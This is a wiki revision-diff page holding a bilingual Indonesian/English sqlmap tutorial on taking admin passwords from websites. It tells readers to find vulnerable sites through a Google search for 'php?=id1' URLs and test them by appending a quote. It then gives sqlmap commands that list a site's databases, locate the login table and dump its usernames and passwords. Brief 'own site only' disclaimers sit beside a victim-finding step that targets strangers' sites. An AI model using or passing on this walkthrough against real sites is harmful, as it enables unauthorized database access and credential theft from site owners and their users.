Sqlmap: memperoleh password database sql: Difference between revisions

From OnnoCenterWiki
Jump to navigationJump to search
← Older edit
Onnowpurbo (talk | contribs)
69,477 edits
Onnowpurbo (talk | contribs)
69,477 edits
No edit summary
Onnowpurbo (talk | contribs)
69,477 edits
No edit summary
 
(One intermediate revision by the same user not shown)
Line 16: Line 16:
  http://alamatweb.com/index.php?=id1′
  http://alamatweb.com/index.php?=id1′


Jika anda memperoleh error maka situs tersebut vurnerable / ada kelemahan & dapat di serang. Jika situs tersebut adalah situs anda sendiri maka sebaiknya dimatikan secepatnya, amankan baru nyalakan kembali.


If you get an error the website is vulnerable.
==Step 2 – Kali SQLMAP – dapatkan website database==


Go to step 2.
sqlmap –u http:\\website.com/page.php?id=1 --dbs
If this is your own website – shut it down immediately. You need to secure it before you bring it back online.


******
Ambil semua database yang tersedia di web.
Step 2 – Kali SQLMAP – get website databases
SQLMAP  – u http:\\website.com/page.php?id=1 –dbs


This will fetch all available databases on the website.  Did you see them listed?
==Step 3 – Cari tabel LOGIN==


******
  sqlmap –u http:\\website.com/page.php?id=1 -D www --tables
Step 3 – Find the LOGIN table
  SQLMAP  – u http:\\website.com/page.php?id=1 –D www tables


Did you see all the TABLES on the website list out?
Cari target seperti, tabel login, username atau password.


Look for likely targets… eg Login, username or password table.
==Step 4 – Dapatkan semua login data==


If you’re not on your own website, or a best friends website (who’s sat next to you), you are into illegal terrority. STOP now!!
sqlmap –u http:\\website.com/page.php?id=1 -D www -T uk_cms_gb_login --columns


******
Tabel ini akan menampilkan kolom, seperti Cookie, ID, IP, Password, Username.
Step 4 – Get all the Login Data (from Step 3)


SQLMAP  u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login –columns
==Step 5 Dapatkan Username (& Admin)==


This should display columns with items such as Cookie, ID, IP, Password, Username.
sqlmap –u http:\\website.com/page.php?id=1 -D www -T uk_cms_gb_login -C username --dump


******
Cari “admin”
Step 5 – Get Usernames (& Admin)
SQLMAP  – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C username –dump


Look for “admin”


*****
==Step 6 – Dapatkan Password (dari Admin)==
Step 6 – Get Passwords (of Admin)
 
  SQLMAP  – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C password –dump
  sqlmap –u http:\\website.com/page.php?id=1 -D www -T uk_cms_gb_login -C password --dump


That’s it.
That’s it.




Latest revision as of 00:34, 14 November 2014

Sumber: http://uwnthesis.wordpress.com/2014/02/01/kali-linux-how-to-hack-use-sqlmap-for-auto-sql-injection-find-website-admin-password/


Berikut adalah cara memperoleh password, termasuk password admin sebuah situs web. Lakukan ini ke web anda sendiri, agar tidak melanggar hukum.


Step 1 – Google search php?=id1

Cari di Google, keyword 

php?=id1

Jika sudah dapat URL-nya dari Google, Tambahkan sebuah quote di akhir URL-nya sehingga menjadi 

http://alamatweb.com/index.php?=id1′

Jika anda memperoleh error maka situs tersebut vurnerable / ada kelemahan & dapat di serang. Jika situs tersebut adalah situs anda sendiri maka sebaiknya dimatikan secepatnya, amankan baru nyalakan kembali.

Step 2 – Kali SQLMAP – dapatkan website database

sqlmap –u http:\\website.com/page.php?id=1 --dbs

Ambil semua database yang tersedia di web.

Step 3 – Cari tabel LOGIN

sqlmap –u http:\\website.com/page.php?id=1 -D www --tables

Cari target seperti, tabel login, username atau password.

Step 4 – Dapatkan semua login data

sqlmap –u http:\\website.com/page.php?id=1 -D www -T uk_cms_gb_login --columns

Tabel ini akan menampilkan kolom, seperti Cookie, ID, IP, Password, Username.

Step 5 – Dapatkan Username (& Admin)

sqlmap –u http:\\website.com/page.php?id=1 -D www -T uk_cms_gb_login -C username --dump

Cari “admin”


Step 6 – Dapatkan Password (dari Admin)

sqlmap –u http:\\website.com/page.php?id=1 -D www -T uk_cms_gb_login -C password --dump

That’s it.


Referensi

Retrieved from "https://lms.onnocenter.or.id/wiki/index.php?title=Sqlmap:_memperoleh_password_database_sql&oldid=41322"